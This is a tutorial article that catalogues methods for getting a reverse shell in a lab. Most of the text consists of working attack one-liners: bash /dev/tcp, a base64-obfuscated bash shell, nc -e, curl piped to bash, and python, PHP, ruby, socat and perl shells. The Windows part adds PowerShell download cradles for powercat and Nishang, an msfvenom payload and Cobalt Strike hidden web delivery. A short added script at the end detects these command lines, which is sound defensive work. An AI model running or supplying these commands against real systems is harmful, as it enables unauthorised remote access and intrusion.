SLTechnology News&Howtos > Network Security, updated 2025-02-27
Shulou (Shulou.com) 05/31 Report
This article introduces the methods of obtaining a reverse shell. It is quite detailed and has some reference value, so interested readers should read it.
Preface
What is a reverse shell?
The control end listens on a TCP/UDP port; the controlled end initiates a connection to that port and redirects the input and output of its command line to the control end. A reverse shell is the counterpart of standard shells such as telnet and ssh: in essence, the client and server roles of the network connection are reversed.
Why is a reverse shell needed?
A reverse shell is usually used when the controlled end cannot be reached directly because of firewall restrictions, insufficient privileges, occupied ports and so on. During a penetration test it is often impossible to connect directly to the target machine because of port restrictions; in that case a reverse shell is used to obtain an interactive shell and continue further. Several ways of obtaining a reverse shell on Windows and Linux systems are described below.
I. Reverse shell under Linux
Experimental environment:
Win10 192.168.2.102, running the nc listener
Kali 192.168.2.103, using its built-in tools
1. bash reverse shell
bash -i >& /dev/tcp/192.168.2.102/7777 0>&1
In special cases the bash reverse shell can be executed in base64-encoded form.
Code address: www.jackson-t.ca/runtime-exec-payloads.html
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAyLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'
Executing this bash command in Kali decodes it back to the original command.
192.168.2.102 requested URL/bin/bash/was not found on this server.
2. nc reverse shell
The -e parameter specifies the program to run once the connection is established: after connecting to the remote end, a local shell (/bin/bash) is handed to it, i.e. a shell is reverse-connected to the remote host. The remote end has then received the shell and can execute commands.
3. curl reverse shell
Kali starts the Apache service and writes the bash command into an HTML file; all that matters is that the text contains the bash command.
curl 192.168.2.103/bash.html|bash
4. whois reverse shell
whois -h 192.168.2.102 -p 4444 `pwd`   // this form can only execute the command that follows (here pwd) and send its output
5. python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.102",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
6. PHP reverse shell
The PHP reverse shell works much the same way as the python one.
php -r '$sock=fsockopen("192.168.2.102",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
7. ruby reverse shell
ruby -rsocket -e'f=TCPSocket.open("192.168.2.102",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
8. socat reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.2.102:4444
9. Perl reverse shell
perl -e 'use Socket;$i="192.168.2.102";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
II. Reverse shell under Windows
1. powercat reverse shell
① Download the remote PS1 script with IEX, bypassing the execution policy, and run it
Execute with powershell:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.2.103 -p 4444 -e cmd
② Powercat download address: github.com/besimorhino/powercat; download it and run it locally.
Powercat is the PowerShell version of Netcat. It is actually a PowerShell function that behaves like Netcat.
2. nc reverse shell
On the target (server side): nc 192.168.2.103 4444 -e c:\windows\system32\cmd.exe
3. Nishang reverse shell
Nishang download address: github.com/samratashok/nishang
Nishang is a PowerShell-based attack framework that integrates PowerShell attack scripts and payloads and can reverse-connect TCP/UDP/HTTP/HTTPS/ICMP shells.
Download Nishang to the attacker host and execute the following command on the target with powershell:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.103 -port 4444
4. Reverse UDP shell
The attacker listens with: nc -lvup 4444
Using the Nishang download from above on the attacker host, execute the following command on the target with powershell:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.103/nishang/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.2.103 -port 4444
5. MSF reverse shell
We can use msfvenom -l together with keyword filtering (such as cmd/windows/reverse) to find the path of the various reverse payloads we need.
msfvenom -l payloads | grep 'cmd/windows/reverse'
Using the payload path found above, we generate a one-line reverse payload with the following command, then copy and paste it onto the target machine to run.
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.2.103 LPORT=4444
The target runs the payload with powershell.
The attacker receives the shell.
6. Cobalt Strike reverse shell
The Cobalt Strike Scripted Web Delivery module can deliver a reverse shell through bitsadmin, powershell, python or regsvr32, similar to the metasploit web_delivery module.
① Start the team server:
./teamserver 192.168.2.103 123   # 123 is the connection password
② Run the client:
On Windows run cobaltstrike.jar   # any username, password 123
③ Open a listener:
Click Cobalt Strike -> Listeners
Payload: windows/beacon_http/reverse_http
Note: windows/beacon is Cobalt Strike's own module, with four listener types: dns, http, https and smb; windows/foreign is an external listener, i.e. an msf or Armitage listener.
④ Generate the powershell payload:
Click Attacks -> Web Drive-by -> Scripted Web Delivery
Type: select powershell
Payload generated:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.103:8887/a'))"
⑤ Run the generated code on Windows.
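The Linux one-liners in part I and the Windows download cradles in part II leave recognisable traces in process command lines (auditd execve records, Sysmon event 1, EDR process events), and the base64 trick from section 1 only hides them until the blob is decoded. The following added example (not from the original article) decodes any embedded `{echo,<b64>}|{base64,-d}` or `echo <b64> | base64 -d` payload before matching, and runs a set of indicators taken from this article's commands over constructed sample command lines.

```python
import base64
import re

# Indicators drawn from the one-liners in this article, as (name, regex) pairs.
INDICATORS = [
    ("bash /dev/tcp redirection", re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("socket dup2 onto stdio", re.compile(r"dup2\s*\(\s*\w+\s*\.\s*fileno\(\)\s*,\s*[012]\s*\)")),
    ("fsockopen/TCPSocket handed to a shell", re.compile(r"(fsockopen|TCPSocket\.open)\(.*/bin/sh")),
    ("nc -e or socat exec", re.compile(r"\bnc\b.*\s-e\s|\bsocat\b.*\bexec:")),
    ("PowerShell download cradle", re.compile(r"IEX\s*\(.*DownloadString\(", re.I)),
    ("Nishang/powercat reverse", re.compile(r"Invoke-PowerShell(Tcp|Udp)\b.*-Reverse|powercat\s.*\s-c\s", re.I)),
    ("hidden non-profile PowerShell", re.compile(r"-nop\b.*-w\s+hidden", re.I)),
]
# A base64 blob piped to base64 -d, in the brace form `{echo,<b64>}|{base64,-d}` (section 1) or plain form.
B64_RE = re.compile(r"(?:\{echo,|echo\s+)([A-Za-z0-9+/=]{16,})\}?\s*\|\s*(?:\{base64,-d\}|base64\s+-d)")

def expand_base64(cmdline):
    """Return cmdline with the decoded text of every embedded base64 payload appended."""
    out = cmdline
    for blob in B64_RE.findall(cmdline):
        try:
            out += "\n" + base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64 after all; keep scanning the raw line
            pass
    return out

def scan(cmdline):
    """Names of the indicators that match cmdline, after decoding embedded base64."""
    text = expand_base64(cmdline)
    return [name for name, rx in INDICATORS if rx.search(text)]

def scan_all(cmdlines):
    """[(cmdline, [indicator names])] for every command line that triggered an indicator."""
    return [(c, scan(c)) for c in cmdlines if scan(c)]

# Constructed command lines, as an auditd execve record or EDR process event would log them.
SAMPLES = [
    "ssh user@192.168.2.102",
    "curl -s https://example.com/index.html | grep title",
    "powershell.exe -c Get-Process | Out-File procs.txt",
    "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAyLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.2.102:4444",
    "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.103/nishang/Shells/"
    "Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.103 -port 4444",
    "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.2.103:8887/a'))\"",
]

if __name__ == "__main__":
    for cmd, hits in scan_all(SAMPLES):
        print(hits, "<-", cmd[:60])
```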
That is all of "What are the methods of obtaining a reverse shell"; thank you for reading. We hope the content shared here helps everyone. For more related knowledge, follow the industry information channel.